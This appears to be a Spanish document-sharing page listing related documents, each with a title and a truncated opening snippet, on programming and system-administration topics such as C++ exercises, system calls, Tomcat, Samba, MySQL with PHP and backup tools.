DOCUMENTACIÓN DEL PROGRAMA DOCUMENTACIÓN DEL PROGRAMA 1. Qué es exactamente el Espía 2004? 1.1 Funcionamiento del programa 2. Configuración del servidor 2.1 Capturar imágenes de la pantalla 2.1.1 Captura Inteligente 2.2 Capturar

Más detalles

LLAMADAS AL SISTEMA SISTEMAS OPERATIVOS

LLAMADAS AL SISTEMA SISTEMAS OPERATIVOS LLAMADAS AL SISTEMA SISTEMAS OPERATIVOS 26/05/2013 eduar14_cr@hotmail.com cilred_tlapa@hotmail.com LLAMADAS AL SISTEMA Las llamadas al sistema proporcionan la interfaz entre un proceso y el sistema operativo,

Más detalles

Examen Septiembre Curso 2001-2002 -- Programación en C++ Pág. 1

Examen Septiembre Curso 2001-2002 -- Programación en C++ Pág. 1 Examen Septiembre Curso 2001-2002 -- Programación en C++ Pág. 1 ÍNDICE ÍNDICE... 1 1.1 Ejercicio 1: Convertidor Dec->Hex y Hex->Dec (5.0 ptos.)... 1 1.1.1 Apartado A (4.0 ptos.)... 1 1.1.2 Apartado B (1.0

Más detalles

Traducción de proyectos con GNU gettext en 15 minutos

Traducción de proyectos con GNU gettext en 15 minutos Traducción de proyectos con GNU gettext en 15 minutos José Tomás Tocino García Hackathon UCA - Diciembre 2010 Este documento tiene licencia «Reconocimiento-CompartirIgual 3.0 España» de Creative Commons

Más detalles

INTRODUCCIÓN AL TIPO COMPUESTO CADENA CONTENIDOS

INTRODUCCIÓN AL TIPO COMPUESTO CADENA CONTENIDOS CONTENIDOS 1. Introducción a las cadenas 2. Definición 3. Declaración de cadenas 4. Inicialización de cadenas 5. Escritura y Lectura de datos tipo cadena 6. Funciones de manipulación de cadenas 7. Arrays

Más detalles

Kosmo Desktop 3.0. Guía de instalación (ES)

Kosmo Desktop 3.0. Guía de instalación (ES) Kosmo Desktop 3.0 Guía de instalación (ES) Kosmo Desktop 3.0 - Guía de instalación Kosmo Desktop 3.0 - Guía de instalación (ES) 2 Kosmo Desktop 3.0 - Guía de instalación (ES) 3 1. Introducción 2. Windows

Más detalles

Los bloques DLL (Figura A.1) externos permiten al usuario escribir su propio código y

Los bloques DLL (Figura A.1) externos permiten al usuario escribir su propio código y Apéndice A Bloques DLL Los bloques DLL (Figura A.1) externos permiten al usuario escribir su propio código y programarlo en lenguaje C, compilarlo dentro de un archivo DLL usando el Microsoft C/C++ o el

Más detalles

8.1 Un primer bucle FOR... 5 8.2 Varias formas de utilizar el bucle FOR... 5 8.3 Calcular el factorial de un número mediante un bucle FOR...

8.1 Un primer bucle FOR... 5 8.2 Varias formas de utilizar el bucle FOR... 5 8.3 Calcular el factorial de un número mediante un bucle FOR... PROGRAMACIÓN EN C++ PRÁCTICA 08 INTRODUCCIÓN A C++ SENTENCIAS DE CONTROL DEL FLUJO DE UN PROGRAMA: Ejercicio 1. Un primer programa en C++....1 Ejercicio 2. Una conversación en C++....2 Ejercicio 3. Una

Más detalles

Práctica 3ProgramacionRS232: Programación básica de la RS232

Práctica 3ProgramacionRS232: Programación básica de la RS232 Práctica 3ProgramacionRS232: Programación básica de la RS232 1 Objetivos El objetivo de esta práctica es la iniciación del alumno en la programación de las comunicaciones en un entorno de desarrollo basado

Más detalles

Tema: INTÉRPRETE ENSAMPOCO/3

Tema: INTÉRPRETE ENSAMPOCO/3 Compiladores. Guía 11 1 Facultad: Ingeniería Escuela: Computación Asignatura: Compiladores Tema: INTÉRPRETE ENSAMPOCO/3 Contenido En esta práctica se desarrollará un intérprete de lenguaje ENSAMPOCO/3

Más detalles

Curso 2º SMR Módulo: SOR Sesión 6 SAMBA: Creando usuarios y grupos en Zentyal

Curso 2º SMR Módulo: SOR Sesión 6 SAMBA: Creando usuarios y grupos en Zentyal Curso 2º SMR Módulo: SOR Sesión 6 SAMBA: Creando usuarios y grupos en Zentyal Qué pretendemos conseguir? Configurar los servicios de compartición de ficheros en Zentyal. Crear grupos. Crear usuarios. Crear

Más detalles

Tutorial DC++ Usarlo es muy sencillo y configurarlo también, aunque tiene algunos trucos importentes.

Tutorial DC++ Usarlo es muy sencillo y configurarlo también, aunque tiene algunos trucos importentes. Tutorial DC++ Para compartir, lo mejor es usar el DC++, que es un programa de intercambio P2P (como el emule) pero optimizado para usarlo en redes locales. Usarlo es muy sencillo y configurarlo también,

Más detalles

www.aprendoencasa.com Curso Introducción JAVA Pág.: 1

www.aprendoencasa.com Curso Introducción JAVA Pág.: 1 www.aprendoencasa.com Curso Introducción JAVA Pág.: 1 Introducción Java es un lenguaje basado en la programación orientada a objetos (POO), este tipo de programación va más allá del tipo de programación

Más detalles

PROYECTO MIS IMÁGENES,

PROYECTO MIS IMÁGENES, Jose Ignacio González Gómez. Departamento de Economía Financiera y Contabilidad Universidad de La Laguna www.jggomez.eu Tema: Script para subir ficheros a través de un formulario y almacenar otros campos

Más detalles

Fundamentos de la programación

Fundamentos de la programación Fundamentos de la programación 4A Grado en Ingeniería Informática Grado en Ingeniería del Software Grado en Ingeniería de Computadores Facultad de Informática Universidad Complutense Archivos como parámetros

Más detalles

Instalación de Tomcat7 en Ubuntu

Instalación de Tomcat7 en Ubuntu 2. Instala el servidor web java TomCat en Windows y Linux. Documenta los módulos/servicios necesarios. Instala el CMS Java Liferay. Documenta el proceso. Instalación de Tomcat7 en Ubuntu Comenzamos instalando

Más detalles

Creación de contenidos educativos AS PONTES 2012. http://www.futureworkss.com 1 By Tino Fernández

Creación de contenidos educativos AS PONTES 2012. http://www.futureworkss.com 1 By Tino Fernández AS PONTES 2012 http://www.futureworkss.com 1 By Tino Fernández INTRODUCCIÓN La evolución de la tecnología informática permite impartir las clases de una forma totalmente diferente a como se hacía hasta

Más detalles

GOOGLE DRIVE GERENCIA DE TECNOLOGIA

GOOGLE DRIVE GERENCIA DE TECNOLOGIA Que es Google Drive? Google Drive te permite almacenar y acceder a tus archivos en cualquier lugar: en la Web, en tu unidad de disco duro o allí donde estés. A continuación, te mostramos cómo funciona:

Más detalles

Manual del Taller de Dropbox. Manual para el Taller de Dropbox

Manual del Taller de Dropbox. Manual para el Taller de Dropbox Manual para el Taller de Dropbox Índice. Objetivos de aprendizaje 2 Dropbox. 2 Crear una cuenta en Dropbox 3 Instalar la aplicación de escritorio de Dropbox.. 4 Agregar archivos en Dropbox. 7 Crear carpetas

Más detalles

Plan de mantenimiento. NetSupport ServiceDesk

Plan de mantenimiento. NetSupport ServiceDesk Plan de mantenimiento NetSupport ServiceDesk para un funcionamiento óptimo TotemGuard.com 1 902 360 645 Índice INTRODUCCION...3 PLAN DE MANTENIMIENTO...4 1. Copia de seguridad (automática)...4 2. Programación

Más detalles

Tema: PROCEDIMIENTOS ALMACENADOS.

Tema: PROCEDIMIENTOS ALMACENADOS. Base de datos I. Guía 9 1 Facultad: Ingeniería Escuela: Computación Asignatura: Base de datos I Tema: PROCEDIMIENTOS ALMACENADOS. Objetivo Específico Conocer la sintaxis de un procedimiento almacenado

Más detalles

Conferencia 26 de diciembre: La Nube y la Sincronización

Conferencia 26 de diciembre: La Nube y la Sincronización Conferencia 26 de diciembre: La Nube y la Sincronización Documento y charla ofrecida por: Marc Gosálbez Linares / Tupxia (http://tupxia.wordpress.com) 1. Introducción / presentación de la conferencia.

Más detalles

Contenidos. Gestión dinámica de memoria. Gestión dinámica de memoria. Introducción. 1. Introducción 2. El operador NEW 3. El operador DELETE

Contenidos. Gestión dinámica de memoria. Gestión dinámica de memoria. Introducción. 1. Introducción 2. El operador NEW 3. El operador DELETE Contenidos 1. Introducción 2. El operador NEW 3. El operador DELETE 1 Introducción Hasta ahora hemos visto que cada vez que queremos usar una variable debemos reservarle un lugar de la memoria al comenzar

Más detalles

Problemas de Redes de Computadores. Ingeniería Técnica en Informática de Gestión Conjunto de problemas 1

Problemas de Redes de Computadores. Ingeniería Técnica en Informática de Gestión Conjunto de problemas 1 Problemas de Redes de Computadores. Ingeniería Técnica en Informática de Gestión Conjunto de problemas 1 Preguntas cortas Pregunta 1.1: Si configuro mi servidor Web para que no acepte conexiones desde

Más detalles

UNIDAD DIDACTICA 15 CONVERTIR UN EQUIPO LINUX SERVER EN CONTROLADOR DE DOMINIO

UNIDAD DIDACTICA 15 CONVERTIR UN EQUIPO LINUX SERVER EN CONTROLADOR DE DOMINIO UNIDAD DIDACTICA 15 CONVERTIR UN EQUIPO LINUX SERVER EN CONTROLADOR DE DOMINIO Eduard Lara 1 1. CONVERTIR UN LINUX SERVER EN CONTROLADOR DE DOMINIO En Linux Server, a diferencia de Windows Server, no existe

Más detalles

DreamWeaver. CS5 y CS6. Cursosindustriales. Curso de DreamWeaver CS6 1

DreamWeaver. CS5 y CS6. Cursosindustriales. Curso de DreamWeaver CS6 1 DreamWeaver CS5 y CS6 Cursosindustriales. Curso de DreamWeaver CS6 1 DREAMWEAVER CS5. DISEÑO DE PÁGINAS DINÁMICAS. En esta segunda sección de diseño de páginas Web con Dreamweaver CS, vamos a hablar sobre

Más detalles

Academia técnica de computación A.T.C.

Academia técnica de computación A.T.C. Academia técnica de computación A.T.C. Free Pascal (FPC) El Free Pascal es un compilador Pascal portable, libre y de código abierto, que representa una alternativa a los productos comerciales Turbo Pascal

Más detalles

Programación básica C++

Programación básica C++ Programación en Lenguaje C++ Programación básica C++ 6.3.1 Declaración de variables Introducción 6 Las variables sirven para identificar un determinado valor. Es importante tener en cuenta, que una variable

Más detalles

MySQL y Sesiones en PHP. Área de Ingeniería Telemática

MySQL y Sesiones en PHP. Área de Ingeniería Telemática MySQL y Sesiones en PHP Contenido Repaso de SQL PHP y MySQL MySQL en PHP 2 Numéricos Standard: Repaso SQL: tipo de datos INTEGER o INT, SMALLINT, DECIMAL o DEC, NUMERIC FLOAT, REAL, DOUBLE PRECISION BIT

Más detalles

Software distribuido

Software distribuido 1 de 17 01/12/2007 1:26 Software distribuido En este documento se detalla el cómo el administrador de una red puede ahorrarse tiempo. Se trata de publicar una serie de programas en el Directorio Activo

Más detalles

Descarga, instalación y uso de herramientas:

Descarga, instalación y uso de herramientas: Descarga, instalación y uso de herramientas: Eclipse: Instalación de Eclipse (Más información en http://www.eclipse.org/) 1. Copiar, descomprimir e instalar si es necesario la última versión de Eclipse

Más detalles

Cómo capturar páginas web con el programa GNU Wget

Cómo capturar páginas web con el programa GNU Wget Cómo capturar páginas web con el programa GNU Wget Raúl Araya, Judit Feliu, Mercedes Suárez {raul.araya; judit.feliu; mercedes.suarez}@iula.upf.es Qué es GNU Wget? Una utilidad de código abierto (GNU)

Más detalles

COPIA DE SEGURIDAD CON NTBACKUP

COPIA DE SEGURIDAD CON NTBACKUP 1 de 11 01/12/2007 1:24 COPIA DE SEGURIDAD CON NTBACKUP Herramienta NTBackup de Windows, En este procedimiento se explica cómo configurar la realización de copias de seguridad mediante la herramienta ntbackup

Más detalles

Protocolo Traslado_envío datos personales

Protocolo Traslado_envío datos personales Protección de la información en mi ordenador. TrueCrypt aplicación para cifrar y proteger la información La manera de evitar los problemas derivados de que la información privada quede expuesta a personas

Más detalles

Paso de Borland Turbo C (bajo DOS) a Anjuta (Linux) 1.

Paso de Borland Turbo C (bajo DOS) a Anjuta (Linux) 1. Paso de Borland Turbo C (bajo DOS) a Anjuta (Linux) 1. Anjuta es un entorno de desarrollo de C que podemos encontrar en cualquier distribución de GNU/Linux. Si nuestra distribución no dispone de ella,

Más detalles

RECIBIR Y ENVIAR MENSAJES CON OUTLOOK EXPRESS

RECIBIR Y ENVIAR MENSAJES CON OUTLOOK EXPRESS RECIBIR Y ENVIAR MENSAJES CON OUTLOOK EXPRESS Outlook Express se puede ejecutar de varias formas. Las más inmediatas son hacer doble clic en el icono de Outlook Express situado en el escritorio, hacer

Más detalles

Taller de Sistemas Operativos Introducción

Taller de Sistemas Operativos Introducción Taller de Sistemas Operativos Introducción Escuela de Ingeniería Civil en Informática Universidad de Valparaíso, Chile http:// Conceptos generales 2 Proceso stdin Descriptor Flujo (FILE*) 0 stdout 1 Proceso

Más detalles

Repaso desarrollo de software Parte #1. Jorge Iván Meza Martínez jimezam@gmail.com

Repaso desarrollo de software Parte #1. Jorge Iván Meza Martínez jimezam@gmail.com Repaso desarrollo de software Parte #1 Jorge Iván Meza Martínez jimezam@gmail.com Especialización en Gestión de Redes de Datos Universidad Nacional de Colombia Sede Manizales 1/55 Contenido Concepto desarrollo

Más detalles

Entrada y salida de datos en C y C++

Entrada y salida de datos en C y C++ Universidad Nacional de Rosario Facultad de Ciencias Exactas, Ingeniería y Agrimensura Escuela de Ingeniería Electrónica Cátedra de Informática II Entrada y salida de datos en C y C++ Informática II Entrada/Salida

Más detalles